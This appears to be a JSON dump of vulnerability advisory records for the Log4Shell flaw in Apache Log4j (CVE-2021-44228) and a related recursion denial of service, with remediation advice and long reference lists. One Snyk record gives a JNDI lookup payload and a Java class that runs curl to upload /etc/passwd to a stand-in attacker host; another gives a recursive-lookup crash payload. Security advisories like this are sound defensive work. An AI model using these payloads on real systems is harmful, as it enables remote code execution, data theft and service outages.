Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014",
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 10,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H"
}
],
"references": [
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "Apache Pony Mail",
"url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f"
},
{
"type": "Apache Security Advisory",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Exploit DB",
"url": "https://www.exploit-db.com/exploits/51183"
},
{
"type": "GitHub Commit",
"url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16"
},
{
"type": "GitHub PR",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "Jira Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3293"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml"
},
{
"type": "Openwall Mail",
"url": "https://www.openwall.com/lists/oss-security/2021/12/28/1"
},
{
"type": "PoC",
"url": "https://github.com/Kirill89/log4shell-vulnerable-server"
},
{
"type": "Snyk Blog and Vulnerability Breakdown",
"url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/"
},
{
"type": "Twitter Post",
"url": "https://twitter.com/marcioalm/status/1471740771581652995"
}
]
},
{
"origin": "osv",
"id": "GHSA-jfh8-c2jp-5v3q",
"modified": "2023-09-19T22:31:08.390693Z",
"published": "2021-12-10T00:40:56Z",
"withdrawn": null,
"summary": "Remote code injection in Log4j",
"details": "# Summary\n\nLog4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.\nAs per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.\n\nLog4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory.\n\n# Impact\n\nLogging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. \n\n# Affected versions\n\nAny Log4J version prior to v2.15.0 is affected to this specific issue.\n\nThe v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible.\n\n## Security releases\nAdditional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3\n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Remediation Advice\n\n## Updated advice for version 2.16.0\n\nThe Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0).\nEven in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33).\n\nUsers who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221).\n\nPlease note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible.\n\n",
"aliases": [
"CVE-2021-44228"
],
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-7rjr-3q55-vv33"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/logging-log4j2"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"type": "WEB",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"type": "WEB",
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"type": "WEB",
"url": "https://github.com/tangxiaofeng7/apache-log4j-poc"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3214"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3221"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/manual/migration.html"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT213189"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"type": "WEB",
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
}
]
},
{
"origin": "snyk",
"id": "GHSA-jfh8-c2jp-5v3q",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n<br>Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n<br>For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 10,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H"
}
],
"references": [
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "Apache Security Advisory",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Exploit DB",
"url": "https://www.exploit-db.com/exploits/51183"
},
{
"type": "GitHub PR",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml"
},
{
"type": "PoC",
"url": "https://github.com/Kirill89/log4shell-vulnerable-server"
},
{
"type": "Snyk Blog and Vulnerability Breakdown",
"url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/"
}
]
},
{
"origin": "snyk",
"id": "CWE-400",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 7.5,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
}
],
"references": [
{
"type": "Apache Security",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "JIRA Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3230"
}
]
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment